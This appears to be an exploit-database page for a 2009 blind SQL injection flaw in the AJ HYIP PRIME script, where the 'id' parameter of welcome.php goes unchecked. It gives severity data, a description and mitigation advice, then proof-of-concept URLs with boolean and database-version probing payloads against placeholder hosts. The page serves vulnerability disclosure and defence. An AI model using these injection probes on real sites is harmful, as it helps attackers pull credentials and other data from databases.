header-logo
Suggest Exploit
vendor:
AJ HYIP
by:
Jose Luis Gongora Fernandez (a.k.a) JosS
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: AJ HYIP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability

AJ HYIP PRIME is vulnerable to Blind SQL Injection. This vulnerability can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. An attacker can use this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords. The vulnerability is caused by the lack of proper input validation of the 'id' parameter in the 'welcome.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code to the vulnerable server. The malicious code will be executed in the context of the web server, allowing the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent malicious SQL code from being executed. Additionally, the web application should be configured to use a least privileged account with limited access to the database.
Source

Exploit-DB raw data:

AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- site: http://www.ajsquare.com/products/ajhyip/index.php

- about AJ HYIP:

AJ HYIP is a complete financial tool with no technical 
knowledge required to manage the site. AJ HYIP software 
is the latest and most advanced HYIP Script with excellent 
navigation features. Our HYIP Script can be easily customized 
to accustom your needs with a potential to generate heavy revenues.


~~ [POC]

http://target/path/welcome.php?id=3 [bSQL]
http://target/path/welcome.php?id=3 and 1=1
http://target/path/welcome.php?id=3 and 1=2

~~ [DEMO]

http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=4
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=5


 __h0__